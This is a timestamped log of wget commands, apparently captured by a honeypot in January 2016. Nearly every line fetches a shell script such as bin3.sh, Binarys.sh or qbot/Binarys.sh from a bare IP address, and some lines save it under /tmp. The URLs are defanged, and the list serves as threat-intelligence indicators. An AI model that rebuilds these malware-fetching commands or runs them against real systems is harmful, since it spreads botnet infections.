2016-01-12 14:43:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 13:02:02 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 12:52:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 11:30:47 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 11:22:14 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 11:22:14 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 11:04:48 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 11:04:48 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 10:50:42 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 10:50:29 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 08:50:05 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 07:53:17 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 05:53:28 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-12 04:49:52 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 04:40:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 04:31:34 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 03:29:42 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 02:14:17 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-12 02:14:11 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-12 01:45:01 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-11 23:11:53 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 23:02:44 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 23:02:43 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 22:45:50 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 22:45:50 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 22:36:13 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-11 22:32:27 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 22:32:27 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 21:48:17 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-11 21:48:15 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-11 21:25:01 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-11 21:21:29 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-11 19:17:44 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-11 18:46:32 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 18:36:28 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 17:50:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 17:40:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 14:26:05 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-11 14:11:40 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 14:11:40 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 14:00:46 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 14:00:46 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:59:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 13:54:43 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:54:42 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:51:42 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:51:42 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:49:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 13:44:07 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:44:07 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:34:46 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:34:46 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 12:25:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 12:15:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 08:38:34 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:38:33 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:38:20 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:28:25 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:28:25 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:22:59 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-11 08:22:57 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-11 08:11:02 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:11:02 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:57:54 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:57:54 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:45:45 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:45:45 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:45:14 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:45:14 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:32:20 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:32:20 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 06:43:22 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 06:33:26 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 05:45:37 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 05:35:45 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 05:01:02 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 04:51:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 03:43:58 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 03:34:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 03:06:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 02:57:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 02:34:40 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 02:25:01 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 01:06:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 00:57:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 00:49:38 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:42:41 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:42:41 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:34:05 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-11 00:28:19 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:28:19 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:13:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 00:04:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 23:18:31 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-10 23:16:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 23:06:26 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 22:31:55 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 21:56:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 21:46:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 21:11:15 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 21:01:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 20:49:46 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 20:40:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 20:25:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 20:15:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 20:14:43 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 20:05:26 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 19:55:46 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-10 19:51:09 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-10 19:46:55 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 19:23:48 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-10 19:23:10 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 19:23:10 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 19:16:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 19:07:02 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 18:48:58 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 18:47:19 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-10 18:39:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 18:19:05 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 18:09:15 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 17:45:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 17:35:23 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 17:31:07 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 17:24:01 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 17:09:50 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 17:09:50 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 16:42:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 16:32:20 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 15:07:41 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-10 12:18:23 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 07:36:02 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 05:19:50 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-10 05:18:36 | wget -q hxxp:// 208.67.1.165/DOGDICKS/Binarys . sh
2016-01-10 04:43:01 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 03:24:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 03:14:55 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 02:43:30 | wget hxxp:// 218.104.49.211/r3//rd . sh-O /tmp/.lm . sh
2016-01-10 02:34:43 | wget wget hxxp:// 218.104.49.211/r3//rd . sh-O /tmp/.lm . sh
2016-01-10 02:15:50 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-10 02:13:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 02:04:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:48:43 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:39:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:16:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:07:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:42:47 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 00:40:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:31:26 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 00:30:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:15:46 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 00:05:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:05:40 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 00:02:25 | wget hxxp:// 94.102.63.136/bin . sh
2016-01-09 23:56:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 23:20:55 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 22:43:46 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-09 22:26:27 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 22:03:05 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 21:18:34 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:59:54 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:58:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 20:57:46 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:48:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 20:48:28 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:40:57 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:40:57 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:24:46 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:24:36 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:24:36 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:11:20 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 20:08:49 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:07:05 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 20:01:36 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 18:44:50 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 18:35:12 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 18:13:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 18:03:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 17:16:47 | wget ftx://51.254.238.19/gb . sh
2016-01-09 14:22:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 14:12:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 13:25:54 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 13:15:46 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 09:53:33 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 09:42:53 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-09 09:42:51 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-09 09:35:50 | wget hxxp:// 158.69.205.212/getbinaries . sh
2016-01-09 08:27:57 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 07:56:56 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 07:48:27 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 06:20:33 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 05:49:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 05:39:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 05:14:00 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 05:02:32 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:52:29 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:43:25 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 04:40:06 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:30:04 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:07:08 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 04:05:31 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 03:44:26 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 03:40:26 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 03:27:09 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 03:27:09 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 03:15:18 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 03:05:34 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 02:57:44 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 02:57:14 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 02:55:39 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 02:44:07 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 02:38:15 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 02:28:29 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 02:04:48 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 01:54:55 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 01:45:07 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 01:23:34 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 01:13:37 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 01:03:32 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 01:02:08 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:55:33 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:55:33 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:51:33 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 00:41:31 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 00:41:29 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:41:29 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:27:11 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 00:26:46 | wget hxxp:// 31.14.136.142/bins . sh
2016-01-09 00:18:20 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 00:08:27 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 00:03:17 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-08 23:21:30 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 23:11:30 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 22:54:40 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 22:44:47 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 22:01:39 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 21:51:53 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 21:43:27 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 21:25:29 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 21:24:16 | wget hxxp:// 31.14.136.142/bins . sh
2016-01-08 21:15:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 21:00:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 20:50:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 20:33:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 20:25:50 | wget ftx://51.254.238.19/gb . sh
2016-01-08 20:24:00 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 19:48:28 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-08 17:43:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 17:33:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 17:19:57 | wget hxp://208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 16:57:53 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-08 16:25:16 | wget ftx://51.254.238.19/gb . sh
2016-01-08 15:39:48 | wget ftx://51.254.238.19/gb . sh
2016-01-08 15:19:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 15:09:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 14:59:52 | wget ftx://51.254.238.19/gb . sh
2016-01-08 14:29:56 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 14:19:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 14:01:43 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 13:51:37 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 13:09:57 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 13:04:01 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 13:04:01 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 12:51:49 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 12:51:49 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 12:51:41 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-08 12:32:19 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 12:29:03 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-08 12:22:09 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 12:19:37 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-08 12:07:29 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-08 10:36:57 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 10:27:09 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 10:07:45 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-08 09:54:24 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 09:44:30 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 08:43:10 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-08 08:43:10 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-08 08:28:11 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 08:22:13 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 08:22:13 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 08:10:03 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 08:10:03 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 07:55:58 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 07:49:47 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 07:49:47 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 07:37:24 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 07:37:24 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 01:20:08 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-08 00:58:02 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 00:51:41 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 00:51:41 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 00:39:26 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-08 00:39:26 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 23:35:21 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-07 23:25:51 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-07 23:16:11 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-07 23:00:56 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-07 22:51:27 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-07 21:40:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 21:30:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 20:09:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 19:59:54 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 19:37:00 | wget hxxp:// 192.227.170.67/Binaries . sh
2016-01-07 16:10:32 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-07 16:09:53 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 15:48:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 15:38:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 13:53:12 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 13:43:39 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 11:59:09 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 11:54:25 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 11:54:25 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 09:48:59 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 09:37:39 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 09:37:39 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 09:21:25 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 09:16:12 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 09:16:11 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-07 09:05:52 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 09:03:16 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-07 08:56:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 08:29:38 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 08:24:46 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 08:24:46 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 07:45:01 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-07 07:21:11 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 07:16:17 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 07:16:17 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 06:51:29 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 06:51:29 | wget hxxp:// 185.130.5.246/bin . sh
2016-01-07 05:33:06 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 05:18:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-07 05:04:59 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-07 03:03:21 | wget hxxp:// 94.102.53.144/bin . sh
2016-01-07 02:55:07 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-07 02:43:59 | wget hxxp:// 192.227.170.67/Binaries . sh
2016-01-07 02:32:13 | busybox wget hxxp:// 80.82.64.177/fucks . sh
2016-01-07 02:32:13 | wget1 hxxp:// 80.82.64.177/fucks2 . sh
2016-01-07 02:27:28 | busybox wget hxxp:// 80.82.64.177/fucks . sh
2016-01-07 02:27:28 | wget1 hxxp:// 80.82.64.177/fucks2 . sh
2016-01-07 00:14:11 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-06 17:20:08 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 17:09:58 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 16:54:11 | wget hxxp:// 208.67.1.142/DOGDICKS/Binarys . sh
2016-01-06 16:45:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 16:35:27 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 16:06:23 | wget hxxp:// 208.89.211.141/cocks . sh-O /tmp/cocks . sh
2016-01-06 14:13:15 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-06 13:27:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 13:18:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-06 10:41:35 | wget hxxp:// 192.227.177.127/gtop . sh
